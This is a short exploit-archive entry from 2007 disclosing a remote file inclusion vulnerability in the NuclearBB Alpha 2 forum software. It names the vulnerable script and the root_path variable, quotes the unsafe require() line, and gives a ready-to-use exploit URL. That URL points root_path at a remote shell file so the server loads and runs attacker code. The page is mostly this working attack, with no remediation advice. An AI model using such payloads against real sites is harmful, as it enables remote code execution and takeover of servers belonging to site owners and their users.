NuclearBB Alpha 2 (root_path) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : NuclearBB Alpha 2 (root_path) Remote File Inclusion Vulnerability
# Published : 2007-09-11
# Author : Rootshell Security
# Previous Title : GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability
# Next Title : X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities

Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/
Vulnerability Type: Remote File Inclusion
Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php
Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: root_path
Line number: 14
Lines:
----------------------------------------------
require("$root_path/inc/functions_email.php");
$mail = new email;
----------------------------------------------

# www.Syue.com [2007-09-11]